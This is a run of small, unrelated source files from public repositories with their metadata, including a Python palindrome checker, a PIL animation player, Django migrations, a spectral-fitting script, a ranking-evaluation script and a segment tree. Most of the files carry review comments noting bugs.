get_hash_tag("rahul_r2557")
| [
"shivamw65@gmail.com"
] | shivamw65@gmail.com |
203d48135e76577a770ff4923a90e54c1bec9816 | bdfa01948ea90e324865c65b85634a9f66554c2d | /Módulo 1/EX_052.py | 41c4b08ba9433e3f610d0cf9365723414768e862 | [] | no_license | dev-dougie/curso_em_video-python | 4352dc93311fb2ce6618641ec45e0d813d6d6018 | c4e0af6b13897f631bb970b8e4da5ce6b905621b | refs/heads/master | 2022-11-19T05:51:53.619999 | 2020-07-23T21:46:44 | 2020-07-23T21:46:44 | 282,061,899 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | p = str(input('Digite a palavra ou frase: ')).strip().upper()
frase = p.split()       # words of the (uppercased, stripped) input 'p'
junto = ''.join(frase)  # the phrase with all whitespace removed
# Reverse with a slice instead of the original char-by-char string
# concatenation loop, which built the result in O(n^2).
inverso = junto[::-1]
# NOTE(review): standard Portuguese spelling is 'palíndromo'; the original
# output strings are preserved byte-for-byte below.
if inverso == junto:
    print('É um políndromo')
else:
    print('Não é um políndromo')
| [
"dougllasp.s@outlook.com"
] | dougllasp.s@outlook.com |
7cba99aca08bf67bf9a2ab23691abd5757786132 | 3582962421cdcdcf887eb1e74369bb62b3d2e22f | /Venv/bin/player.py | 7917d4a315e3020044f83a2d774bf3156a3454bb | [] | no_license | NickConnelly/NewTort | 5d9b5ebd45961b74315fb9bebe02f78835d1d531 | 7d84203b573e7a764e0a887d4a508f40976ae07d | refs/heads/master | 2020-04-02T03:25:44.047807 | 2016-07-22T02:42:18 | 2016-07-22T02:42:18 | 63,916,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,209 | py | #!/home/nick/Desktop/Tortoisewag742016/Venv/bin/python
#
# The Python Imaging Library
# $Id$
#
from __future__ import print_function
try:
from tkinter import *
except ImportError:
from Tkinter import *
from PIL import Image, ImageTk
import sys
# --------------------------------------------------------------------
# an image animation player
class UI(Label):
    """Tk label that plays an animated image (PIL demo player).

    ``im`` is either a list of PIL images (pre-loaded frames) or a single
    multi-frame PIL image advanced via ``seek``. Frames are scheduled with
    Tk ``after`` using each frame's ``duration`` metadata (default 100 ms).
    """
    def __init__(self, master, im):
        if isinstance(im, list):
            # list of images
            # NOTE(review): the first list element appears to be skipped
            # (self.im starts at im[1:]) -- behavior kept from the demo.
            self.im = im[1:]
            im = self.im[0]
        else:
            # sequence
            self.im = im
        if im.mode == "1":
            # 1-bit images need a bitmap wrapper to render with a foreground.
            self.image = ImageTk.BitmapImage(im, foreground="white")
        else:
            self.image = ImageTk.PhotoImage(im)
        Label.__init__(self, master, image=self.image, bg="black", bd=0)
        self.update()
        try:
            duration = im.info["duration"]
        except KeyError:
            duration = 100
        self.after(duration, self.next)
    def next(self):
        # Advance to the next frame and reschedule; stop silently at the end.
        if isinstance(self.im, list):
            try:
                im = self.im[0]
                del self.im[0]
                self.image.paste(im)
            except IndexError:
                return # end of list
        else:
            try:
                im = self.im
                im.seek(im.tell() + 1)
                self.image.paste(im)
            except EOFError:
                return # end of file
        try:
            duration = im.info["duration"]
        except KeyError:
            duration = 100
        self.after(duration, self.next)
        self.update_idletasks()
# --------------------------------------------------------------------
# script interface
if __name__ == "__main__":
    # CLI: player.py imagefile [imagefile ...]
    # One file -> treat it as a multi-frame sequence; several files -> a
    # pre-loaded list of frames.
    if not sys.argv[1:]:
        print("Syntax: python player.py imagefile(s)")
        sys.exit(1)
    filename = sys.argv[1]
    root = Tk()
    root.title(filename)
    if len(sys.argv) > 2:
        # list of images
        print("loading...")
        im = []
        for filename in sys.argv[1:]:
            im.append(Image.open(filename))
    else:
        # sequence
        im = Image.open(filename)
    UI(root, im).pack()
    root.mainloop()
| [
"nick.connelly@live.com"
] | nick.connelly@live.com |
2cb8ca949fcf8d9c0a0769f1582b3ef182b43004 | bed31e66a8a94a936afb61bd60b98ab5785a7e99 | /redditfunction.py | 80d42d381e407bd934ebb4b7599de6c0346bb045 | [] | no_license | MuskanSinghal/AnalyzingTrends | 6d0c9a08657c6540452f27c71f8de6e0317dc49e | 3aaa147eb35fcbb3daec1de87a056f051675518e | refs/heads/master | 2022-10-08T19:52:50.203070 | 2020-06-08T19:47:15 | 2020-06-08T19:47:15 | 270,776,371 | 0 | 0 | null | 2020-06-08T18:15:47 | 2020-06-08T18:15:47 | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
import requests
import json
class RedditFunction:
    """Thin client for the Pushshift Reddit submission-search API."""

    def getPushshiftData(self, size, after, before, queryr):
        """Return the 'full_link' URL of each matching high-score submission."""
        query_string = (
            '&sort=desc&sort_type=score&over_18=false&score=>2000&size='
            + str(size)
            + '&after=' + str(after)
            + '&before=' + str(before)
            + '&q=' + str(queryr)
        )
        url = 'https://api.pushshift.io/reddit/search/submission/?' + query_string
        print(url)
        response = requests.get(url)
        payload = json.loads(response.text)
        return [post['full_link'] for post in payload['data']]
| [
"claytonmgravatt@gmail.com"
] | claytonmgravatt@gmail.com |
bdc2a4945556fd632e26d71c5acfeb2aaa531578 | f5785fb207619246463396b0ea51406e165ac7fd | /Week_01/42.接雨水.py | 40b3b63bcaed27d4756e5d78d6e4f943253868ff | [] | no_license | loveyinghua1987/algorithm014-algorithm014 | a6a1193145b876c25b2ca9b510c75055219f1d39 | 2f739162fa8f55aca5861b55eba67f430eedb5a6 | refs/heads/master | 2023-01-02T10:52:34.099502 | 2020-10-31T03:09:11 | 2020-10-31T03:09:11 | 286,626,769 | 0 | 0 | null | 2020-08-11T02:33:07 | 2020-08-11T02:33:07 | null | UTF-8 | Python | false | false | 1,325 | py | #
# @lc app=leetcode.cn id=42 lang=python3
#
# [42] 接雨水
#
# @lc code=start
class Solution:
    def trap(self, height: "List[int]") -> int:
        """LeetCode 42 (Trapping Rain Water): two-pointer, O(n) time, O(1) space.

        Walk inward from both ends; the side with the lower wall determines
        how much water the current cell holds, bounded by the running maximum
        seen on that side.
        """
        # NOTE: the annotation is quoted because `List` is never imported in
        # this file; an unquoted `List[int]` raised NameError at import time.
        # (The original also carried a dead, commented-out stack-based
        # solution in a triple-quoted string; it has been removed.)
        i, j = 0, len(height) - 1
        max_left, max_right = 0, 0
        water = 0
        while i < j:
            if height[i] < height[j]:
                # Left wall is the lower one: water above height[i] is bounded
                # by max_left (the right side is at least as tall).
                if height[i] >= max_left:
                    max_left = height[i]
                else:
                    water += max_left - height[i]
                i += 1
            else:
                # Right wall is the lower (or equal) one.
                if height[j] >= max_right:
                    max_right = height[j]
                else:
                    water += max_right - height[j]
                j -= 1
        return water
# @lc code=end
| [
"chendandanens@126.com"
] | chendandanens@126.com |
96ca952f04e3772a34cf8f1397fd20610d15c7a0 | 40caa23ac77a06d3062071363bc0d0332aeeeeb0 | /main/migrations/0002_game_status.py | dac473fa3fe04db8772b13f2e2c130ceacfe973e | [] | no_license | BasketballData/BasketballDataScrape | 5fac683f43c52ccab15d6276e880a114fd5ee00f | 39f7d1aab9f59ba72626387b7eea4029ec2cf8f3 | refs/heads/master | 2021-07-13T13:01:27.908214 | 2017-10-13T19:00:23 | 2017-10-13T19:00:23 | 103,017,164 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 12:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a required ``status`` CharField to the ``game`` model."""

    dependencies = [
        ('main', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='game',
            name='status',
            # One-off default used to populate existing rows; with
            # preserve_default=False it is not kept on the model afterwards.
            field=models.CharField(default='live', max_length=300),
            preserve_default=False,
        ),
    ]
| [
"netcrime4@gmail.com"
] | netcrime4@gmail.com |
7df9946881c39fa19927dc7af9adc718209f4830 | b491cdde72d8d4beaa07ac9ca969dfe865856314 | /minimalpipeline-master/scripts/ev_cv.py | c4aff95664b2c9fb004e9967118f56499f7b756a | [] | no_license | FellinRoberto/PersonalityPrediction | 659a2c4cc94778f57b2da86991ec8dab971e74c1 | 0750b78f67c7693cfcae17024e3506e2d0f644fb | refs/heads/master | 2021-01-01T18:16:57.249997 | 2017-11-10T15:40:07 | 2017-11-10T15:40:07 | 98,294,451 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,917 | py | from __future__ import division
import os
import sys
import logging
from optparse import OptionParser
import metrics
from ev import read_res_pred_files
import math
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def stats_cv(path=".", format="trec", prefix="svm", th=50, verbose=False):
    """Aggregate IR-vs-SVM ranking metrics over cross-validation folds.

    Scans ``path`` for fold directories (names starting with "fold"), each
    holding "<prefix>.test.res" (baseline search-engine ranking) and
    "<prefix>.pred" (SVM predictions). For every fold it prints MRR, MAP and
    Precision@1 for both systems plus absolute/relative improvements, then
    prints the mean +/- std of each metric across all folds.

    Python 2 code (print statements). Exits the process on missing or
    unparsable input files.
    """
    mrrs_se = []
    mrrs_svm = []
    abs_mrrs = []
    rel_mrrs = []
    maps_se = []
    maps_svm = []
    abs_maps = []
    rel_maps = []
    recalls1_se = []
    recalls1_svm = []
    abs_recalls = []
    rel_recalls = []
    oracle_mrrs = []
    oracle_maps = []
    oracle_recs1 = []
    num_folds = 0
    print "%13s %5s %7s %7s" %("IR", "SVM", "(abs)", "(rel)")
    for fold in sorted(os.listdir(path)):
        currentFold = os.path.join(path, fold)
        if not os.path.isdir(currentFold):
            continue
        if not fold.startswith("fold"):
            logging.warn("Directories containing CV folds should start with 'fold'")
            continue
        print fold
        # Relevancy file
        res_fname = os.path.join(currentFold, "%s.test.res" % prefix)
        if not os.path.exists(res_fname):
            logging.error("Relevancy file not found: %s", res_fname)
            sys.exit(1)
        # Predictions file
        pred_fname = os.path.join(currentFold, "%s.pred" % prefix)
        if not os.path.exists(pred_fname):
            logging.error("SVM prediction file not found: %s", pred_fname)
            sys.exit(1)
        # NOTE(review): bare except below swallows the real parse error.
        try:
            ir, svm = read_res_pred_files(res_fname, pred_fname, format, verbose)
        except:
            logging.error("Failed to process input files: %s %s", res_fname, pred_fname)
            logging.error("Check that the input file format is correct")
            sys.exit(1)
        # MRR
        mrr_se = metrics.mrr(ir, th)
        mrr_svm = metrics.mrr(svm, th)
        mrrs_se.append(mrr_se)
        mrrs_svm.append(mrr_svm)
        # improvement
        abs_mrr_diff = mrr_svm - mrr_se
        rel_mrr_diff = (mrr_svm - mrr_se)*100/mrr_se
        abs_mrrs.append(abs_mrr_diff)
        rel_mrrs.append(rel_mrr_diff)
        print "MRR: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (mrr_se, mrr_svm, abs_mrr_diff, rel_mrr_diff)
        # MAP
        map_se = metrics.map(ir)
        map_svm = metrics.map(svm)
        maps_se.append(map_se)
        maps_svm.append(map_svm)
        # improvement
        abs_map_diff = map_svm - map_se
        rel_map_diff = (map_svm - map_se)*100/map_se
        abs_maps.append(abs_map_diff)
        rel_maps.append(rel_map_diff)
        print "MAP: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (map_se, map_svm, abs_map_diff, rel_map_diff)
        # Recall-of-1@1
        rec_se = metrics.recall_of_1(ir, th)[0]
        rec_svm = metrics.recall_of_1(svm, th)[0]
        recalls1_se.append(rec_se)
        recalls1_svm.append(rec_svm)
        # improvement
        abs_rec_diff = rec_svm - rec_se
        rel_rec_diff = (rec_svm - rec_se)*100/rec_se
        abs_recalls.append(abs_rec_diff)
        rel_recalls.append(rel_rec_diff)
        print "P@1: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (rec_se, rec_svm, abs_rec_diff, rel_rec_diff)
        num_folds += 1
        '''
        mrr_oracle = metrics.oracle_mrr(ir, th)
        map_oracle = metrics.oracle_map(ir)
        prec_oracle = metrics.oracle_precision(ir, th)[0]
        rec1_oracle = metrics.oracle_recall_of_1(ir, th)[0]
        oracle_mrrs.append(mrr_oracle)
        oracle_maps.append(map_oracle)
        oracle_recs1.append(rec1_oracle)
        print "Oracle MRR: %5.2f, Oracle MAP: %5.2f, Oracle prec: %5.2f, Oracle rec@1: %5.2f" % (mrr_oracle, map_oracle, prec_oracle, rec1_oracle)
        '''
    # Cross-fold averages (mean and standard deviation per metric).
    # mrrs
    avg_mrr_se, std_mrr_se = mean_and_std(mrrs_se)
    avg_mrr_svm, std_mrr_svm = mean_and_std(mrrs_svm)
    avg_abs_impr_mrr, std_abs_impr_mrr = mean_and_std(abs_mrrs)
    avg_rel_impr_mrr, std_rel_impr_mrr = mean_and_std(rel_mrrs)
    #oracle_avg_mrr, std_oracle_avg_mrr = mean_and_std(oracle_mrrs)
    # maps
    avg_map_se, std_map_se = mean_and_std(maps_se)
    avg_map_svm, std_map_svm = mean_and_std(maps_svm)
    avg_abs_impr_map, std_abs_impr_map = mean_and_std(abs_maps)
    avg_rel_impr_map, std_rel_impr_map = mean_and_std(rel_maps)
    #oracle_avg_map, std_oracle_avg_map = mean_and_std(oracle_maps)
    # recall
    avg_rec1_se, std_rec1_se = mean_and_std(recalls1_se) # se
    avg_rec1_svm, std_rec1_svm = mean_and_std(recalls1_svm) # svm
    avg_abs_impr_rec1, std_abs_impr_rec1 = mean_and_std(abs_recalls) # absolute
    avg_rel_impr_rec1, std_rel_impr_rec1 = mean_and_std(rel_recalls) # relative
    #oracle_avg_rec1, std_oracle_avg_rec1 = mean_and_std(oracle_recs1)
    FMT = u"%3s: %5.2f \u00B1 %4.2f %5.2f \u00B1 %4.2f %+6.2f%% \u00B1 %4.2f %+6.2f%% \u00B1 %4.2f"
    #ORACLE_FMT = u"Oracle MRR: %5.2f \u00B1 %4.2f, Oracle MAP: %5.2f \u00B1 %4.2f, Oracle P@1: %5.2f \u00B1 %4.2f"
    print
    print "Averaged over %s folds" % num_folds
    print "%17s %12s %14s %14s" %("IR", "SVM", "(abs)", "(rel)")
    print FMT % ("MRR", avg_mrr_se, std_mrr_se, avg_mrr_svm, std_mrr_svm, avg_abs_impr_mrr, std_abs_impr_mrr, avg_rel_impr_mrr, std_rel_impr_mrr)
    print FMT % ("MAP", avg_map_se, std_map_se, avg_map_svm, std_map_svm, avg_abs_impr_map, std_abs_impr_map, avg_rel_impr_map, std_rel_impr_map)
    print FMT % ("P@1", avg_rec1_se, std_rec1_se, avg_rec1_svm, std_rec1_svm, avg_abs_impr_rec1, std_abs_impr_rec1, avg_rel_impr_rec1, std_rel_impr_rec1)
    #print ORACLE_FMT % (oracle_avg_mrr, std_oracle_avg_mrr, oracle_avg_map, std_oracle_avg_map, oracle_avg_rec1, std_oracle_avg_rec1)
    # print "Averaged absolute improvement"
    # print "MRRof1: %6.2f%%" % abs_mrr_impr
    # print "RECof1: %6.2f%%" % abs_recall_impr
    # print "Averaged relative improvement"
    # print "MRRof1: %6.2f%%" % rel_mrr_impr
    # print "RECof1: %6.2f%%" % rel_recall_impr
def mean_and_std(values):
    """Return (mean, sample standard deviation) of *values*.

    Uses the n-1 (Bessel-corrected) denominator, so *values* must contain
    at least two elements.
    """
    size = len(values)
    mean = sum(values)/size
    squared_deviations = sum((v - mean)**2 for v in values)
    std = math.sqrt((1.0/(size-1)) * squared_deviations)
    return mean, std
def main():
    """Parse CLI options and run stats_cv over the given CV directory.

    NOTE(review): the usage text documents two positional args, but only the
    single-argument (CV directory) form is handled below; the --verbose flag
    is parsed yet never forwarded -- verify intent.
    """
    usage = "usage: %prog [options] arg1 [arg2]"
    desc = """arg1: file with the output of the baseline search engine (ex: svm.test.res)
    arg2: predictions file from svm (ex: train.predictions)
    if arg2 is ommited only the search engine is evaluated"""
    parser = OptionParser(usage=usage, description=desc)
    parser.add_option("-t", "--threshold", dest="th", default=15, type=int,
                      help="supply a value for computing Precision up to a given threshold "
                      "[default: %default]", metavar="VALUE")
    parser.add_option("-f", "--format", dest="format", default="trec",
                      help="format of the result file (trec, answerbag): [default: %default]",
                      metavar="VALUE")
    parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true",
                      help="produce verbose output [default: %default]")
    (options, args) = parser.parse_args()
    if len(args) == 1:
        path = args[0]
        stats_cv(path=path, format=options.format, th=options.th)
    else:
        parser.print_help()
        sys.exit(1)
if __name__ == '__main__':
    main()
| [
"fellin.roberto@hotmail.it"
] | fellin.roberto@hotmail.it |
5b3762c02c7c7b4b4f9facb6cac52f2b636c4428 | d2160e6de585d75ec42b1cd861340c3d78610984 | /BillChop/chop/migrations/0007_receipt_image.py | 3e55297ef9c209879adfd97392efb25a3cedf90e | [] | no_license | singichs/BillChop | 8eabacd9ea9e02766947592c640489f486329952 | b726fde5beb421e41cb23c060f618aa5bc84ad56 | refs/heads/master | 2020-04-09T06:18:46.812438 | 2018-12-02T23:37:37 | 2018-12-02T23:37:37 | 160,106,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-11 07:35
from __future__ import unicode_literals

from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional ``image`` upload field to the ``receipt`` model."""

    dependencies = [
        ('chop', '0006_auto_20171108_1611'),
    ]
    operations = [
        migrations.AddField(
            model_name='receipt',
            name='image',
            # Optional image; uploads land under MEDIA_ROOT/receipt_images/.
            field=models.ImageField(blank=True, null=True, upload_to='receipt_images/'),
        ),
    ]
| [
"jmkunnat@umich.edu"
] | jmkunnat@umich.edu |
2927f00d5c0dc243e901c6ece4b6bfb68541df6d | bd51254da13c09bb60b216280788acc89926e89a | /analytics/EtaCar/Hepsilon/GMOS/fit_gmos_hepsilon.py | 59cf31edede8af31ccbc0c3304ba3c5ddd42e581 | [] | no_license | DavoGrant/SpectralDynamics | d52257699a08fa599966a85b22c9c3c2d87224a0 | 9304794b2b22242bfa6ba70bc50f88eae19ea3ff | refs/heads/master | 2023-08-08T15:45:33.802822 | 2022-06-22T08:21:43 | 2022-06-22T08:21:43 | 215,364,235 | 0 | 0 | null | 2022-06-22T01:20:23 | 2019-10-15T18:03:08 | Python | UTF-8 | Python | false | false | 2,500 | py | import sqlite3
import pandas as pd
from config import RESULTS_PATH, DB_PATH
from extract.core.spectra import SpectralHandler
from extract.core.lines import SpectralFits
from extract.observatories.gemini import GeminiTelescopeInstruments
from extract.features.etacar_library import etacar_templates
from extract.helpers import fetch_bad_jds
# Initialise dataset from disk.
handler = SpectralHandler()
handler.select_fits_dataset(
    dataset_path=RESULTS_PATH, datastream='GMOS',
    data_release='Archival', target='EtaCar', dimension='2D')
# Fitting config: one entry per regime. 'jd_rule' selects spectra before or
# after the given Julian date (the 'benchmark' regime takes every epoch).
concat_table = 'Hepsilon_RegimeConcat2'
jd_tuples = [{'label': 'constant-1', 'template': 'Harvard_GMOS_C1',
              'solver': 'CF', 'jd_rule': (2454907.778, 'before')},
             {'label': 'constant-2', 'template': 'Harvard_GMOS_C2',
              'solver': 'CF', 'jd_rule': (2454907.778, 'after')},
             {'label': 'benchmark', 'template': 'BHM',
              'solver': 'BHM', 'jd_rule': (None, 'exact')}]
# Iterate different fitting regimes.
res_tables = []
for regime in jd_tuples:
    print('\nStarting new fitting regime={}\n'.format(regime['label']))
    # Select subset of the dataset.
    handler.select_fits_subset(
        pre_processing=None, binning=None, exposure=(None, 'max'),
        reduction=None, observatory=None, jd=regime['jd_rule'])
    # Define fitting routines.
    fitter = SpectralFits(GeminiTelescopeInstruments.gmos)
    fitter.add(etacar_templates.h_i_3970(version=regime['template'],
                                         solver=regime['solver']))
    # Ready fitting routine and pre-processing options.
    fitter.compile(helio_correction=False, continuum_normalisation=True,
                   re_bin=None, refine_continuum=True,
                   bad_jds=fetch_bad_jds(db_path=DB_PATH,
                                         fit='h_epsilon_master',
                                         comp='Any'))
    # Execute fitting routines (results are written to the database).
    fitter.fit(handler.data_subset, diagnostics=False, draw=False, db_path=DB_PATH)
    # Store consecutive regimes (the benchmark regime is excluded from concat).
    if not regime['label'] == 'benchmark':
        res_tables.extend(fitter.table_names)
# Join regimes: copy each per-regime table into one concatenated table.
# NOTE(review): the sqlite connection is not closed if the copy loop raises;
# consider contextlib.closing().
print('Collating fits into table={}'.format(concat_table))
connection = sqlite3.connect(DB_PATH)
for t in res_tables:
    query = 'SELECT * FROM {} '.format(t)
    data_table = pd.read_sql_query(query, connection)
    data_table.to_sql(concat_table, connection, if_exists='append', index=False)
connection.close()
| [
"david.grant@physics.ox.ac.uk"
] | david.grant@physics.ox.ac.uk |
33f57616db70a4b29866938453f716978cba239a | ea12f060702af72a7a408d83b67424579a9215e0 | /pet.py | 8d973ae8402d9adb05984dac802c52aaccdf27ab | [] | no_license | kenanAlhindi97/b-ignited-python | 4e4b24dd15ad9a519145f0edb728d219ace1bc79 | dc164d71df87048dd45f96827638b6b4642b7542 | refs/heads/master | 2023-08-25T21:56:26.994111 | 2021-10-04T11:01:42 | 2021-10-04T11:01:42 | 413,389,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py | class Tag:
    def __init__(self, tag_id, tag_name):
        # Store the tag's numeric id and display name verbatim.
        self.tag_name = tag_name
        self.tag_id = tag_id
    def to_json(self):
        # Serialize to the Petstore tag schema: {"id": ..., "name": ...}.
        return {
            "id": self.tag_id,
            "name": self.tag_name
        }
class Pet:
    """Plain data holder for a pet, serializable to the Petstore JSON shape."""

    def __init__(self, name, pet_id, category, cat_id, image_urls, status, tags):
        """Store the pet's attributes verbatim."""
        self.name = name
        self.pet_id = pet_id
        self.category = category
        self.cat_id = cat_id
        self.image_urls = image_urls
        self.status = status
        self.tags = tags

    def to_json(self):
        """Return a dict matching the Petstore API pet schema."""
        payload = {}
        payload["id"] = self.pet_id
        payload["name"] = self.name
        payload["category"] = {"id": self.cat_id, "name": self.category}
        payload["photoUrls"] = self.image_urls
        payload["tags"] = self.tags
        payload["status"] = self.status
        return payload
| [
"alhinke@cronos.be"
] | alhinke@cronos.be |
be3d4de077db43c7cf8777d1fc655106e6be15a2 | fab208825764bd6b50b8198a364ea04521b70566 | /ticketing/migrations/0002_cinema.py | dbfe651f36348b29ef6f202b278b79b5c5bf3c0d | [] | no_license | iam-Robo/DjangoCourse | 69bb2bf9fe6582b94ebf1fefccf0321a544183bc | 0842c966048b773ae0a177f6acf1887e22b2a5ef | refs/heads/master | 2023-08-26T12:09:31.655701 | 2021-10-23T06:54:55 | 2021-10-23T06:54:55 | 370,765,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | # Generated by Django 3.2.3 on 2021-05-26 07:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ``Cinema`` model for the ticketing app."""

    dependencies = [
        ('ticketing', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Cinema',
            fields=[
                # Natural primary key supplied by the application (no auto id).
                ('cinema_code', models.IntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=50)),
                # City defaults to 'تهران' (Tehran).
                ('city', models.CharField(default='تهران', max_length=30)),
                ('capacity', models.IntegerField()),
                ('phone', models.CharField(max_length=20, null=True)),
                ('address', models.TextField()),
            ],
        ),
    ]
| [
"a.abizadeh@gmail.com"
] | a.abizadeh@gmail.com |
8c9831cf023007d0c71f173fc3e83ba0fd0dfc19 | 7d19af9fbaf3bdb07cadb05c17fa5b6ee61e3062 | /devel/py-editorconfig-core/patches/patch-setup.py | a5b21c51aeed7ea9288740b110be13bfd9ccb375 | [] | no_license | jrmarino/pkgsrc-synth | ff96437a20953c832777a70b9ad298229154fa35 | dc200e5f34878e8b3d57d4a5c321077c79b42ec7 | refs/heads/master | 2022-06-07T17:08:57.130400 | 2022-05-01T00:22:20 | 2022-05-01T00:22:20 | 71,819,061 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | $NetBSD: patch-setup.py,v 1.2 2018/08/15 11:23:08 adam Exp $
* remove non-versioned file. The console command for editorconfig-core
is in the editorconfig-core package. Removing this file removes the
conflict that this package would have with the editorconfig-core
package.
--- setup.py.orig 2018-04-17 03:59:54.000000000 +0000
+++ setup.py
@@ -11,11 +11,6 @@ setup(
license='python',
description='EditorConfig File Locator and Interpreter for Python',
long_description=open('README.rst').read(),
- entry_points = {
- 'console_scripts': [
- 'editorconfig = editorconfig.main:main',
- ]
- },
classifiers=[
'License :: OSI Approved :: Python Software Foundation License',
'Operating System :: OS Independent',
| [
"dragonflybsd@marino.st"
] | dragonflybsd@marino.st |
e657bcfe649192e8afa5b0080dfb8e538965f618 | b4dea670701c4964af80eefe0e251bf9b3770c45 | /test.py | b3d5377c83b4b97dd6d408d5d33eb35a6a0d1b61 | [] | no_license | zohaibjan/Ensemble_PSO_Python_V1 | 54a3c85d26c07e78f529245d5ceb4e556ed92cfe | 1f06f72ba1156cbb930fa3be9d596944cb375d99 | refs/heads/master | 2020-11-24T10:27:03.380254 | 2020-11-02T11:30:43 | 2020-11-02T11:30:43 | 228,107,167 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 4 12:12:00 2019
@author: janz
"""
from mainProgram import mainProgram
import numpy as np
import csv
# Benchmark data sets to evaluate; a set, so iteration order is arbitrary.
# (The original used redundant '\' continuations inside the braces.)
data = {'thyroid', 'wine', 'diabetes',
        'segment', 'ecoli', 'cancer',
        'vehicle', 'iris', 'liver', 'ionosphere',
        'sonar', 'glass'}
# Repeated runs per data set -- presumably consumed by the experiment driver;
# unused in this snippet. TODO confirm.
numOfRuns = 10
# Append the CSV header row. 'with' closes the handle even if writerow raises
# (the original also shadowed the builtin name 'file' and never used a
# context manager, and ended with a stray semicolon).
with open("results.csv", mode="a") as results_file:
    results = csv.writer(results_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
    results.writerow(["Data set", "Accuracy without optimization", "Accuracy with optimization"])
| [
"zohaibjan@zohaibs-MacBook-Pro.local"
] | zohaibjan@zohaibs-MacBook-Pro.local |
7a895befdacc4f2f0ea72dc5eec7438bc6eb2c5a | eab04e0cf3b51840de0c446da352d9c70ef7942a | /NPTEL Course/Concept Practices/prime.py | 32b8b878f5f74df4e30818c2ccb63cf3971269bc | [] | no_license | yashgugale/Python-Programming-Data-Structures-and-Algorithms | eb2a49291440a29de98031de87208404350f9386 | 8d2b57e72ebac1f063b40b6c1f69683ade8703eb | refs/heads/master | 2021-08-08T05:59:31.628803 | 2017-11-09T17:30:09 | 2017-11-09T17:30:09 | 105,263,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def isprime(n):
    """Classify ``n`` by trial division, printing whether it is prime,
    composite, or (for 1) neither. Returns None; output goes to stdout.
    """
    factors = []
    if n == 1:
        print("1 is neither prime nor composite")
        # BUGFIX: 1 must not fall through -- with no divisors in [2, n] it
        # would also (wrongly) be reported as a prime number below.
        return
    # Collect every divisor of n in [2, n]; for a prime this is just [n].
    for i in range(2,n+1):
        if n%i == 0:
            factors.append(i)
    # BUGFIX: the original tested len(factors) > 2, which misclassified
    # numbers such as 4 or 9 (exactly two divisors here: p and n) as prime.
    # A number is composite iff it has any divisor besides n itself.
    if len(factors) > 1:
        print(n," is a composite number")
    else:
        print(n," is a prime number")
#isprime(5)
"""
def isprime(n):
return(factors(n) == [1,n])
ie if the factors of n are 1 and the number itself, then return that the number
is a prime number
"""
| [
"yashgugale@bitbucket.org"
] | yashgugale@bitbucket.org |
047851a7765a38405e92e6524f7a6cba7247af3b | 6750596d7bfbc192c5d2e706a05cb2163923b2e2 | /range-min-py/rangemin.py | a517af99f84659fe3cef8b5306bbaf88cd02f38a | [] | no_license | ak-19/segment-tree | b284c1b795604eb53ebda5f39322a7b8abe4fab8 | 9b06f2e83e1940fa7b79f44502e25ab9e2d8b725 | refs/heads/master | 2022-08-24T15:48:22.623939 | 2022-07-19T12:20:45 | 2022-07-19T12:20:45 | 173,442,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | from math import inf
class MinSegementTree:
    """Iterative (bottom-up) segment tree answering range-minimum queries.

    Leaves live at indices N..2N-1 of ``self.A``; the parent of node i is
    i // 2 and its children are 2i and 2i+1. The root is at index 1
    (A[0] is unused padding). Works for any N >= 1.
    """

    def __init__(self, A):
        self.N = len(A)
        # Internal nodes occupy A[0..N-1]; leaves are a copy of the input.
        self.A = [0] * self.N + A
        for i in range(self.N-1, -1, -1):
            self.A[i] = min(self.A[i * 2], self.A[i * 2 + 1])

    def update(self, index, val):
        """Set element ``index`` to ``val`` and refresh all ancestors.

        BUGFIX: the original did ``A[parent] = min(A[parent], val)`` and
        stopped at ``index > 1``, so (a) raising a value never propagated
        upward (ancestors kept the stale smaller minimum) and (b) the root
        at index 1 was never refreshed at all.
        """
        index += self.N
        self.A[index] = val
        index //= 2
        while index >= 1:
            # Recompute from the children instead of min-ing with the old value.
            self.A[index] = min(self.A[index * 2], self.A[index * 2 + 1])
            index //= 2

    def min(self, L, R):
        """Return min of elements L..R (inclusive) in O(log N)."""
        L += self.N
        R += self.N
        result = inf
        while L <= R:
            if L % 2 == 1:
                # L is a right child: its subtree is only partially covered,
                # so take the node itself and step inward.
                result = min(result, self.A[L])
                L += 1
            if R % 2 == 0:
                # Symmetric case for the right boundary (a left child).
                result = min(result, self.A[R])
                R -= 1
            L //= 2
            R //= 2
        return result
| [
"ante.kotarac@gmail.com"
] | ante.kotarac@gmail.com |
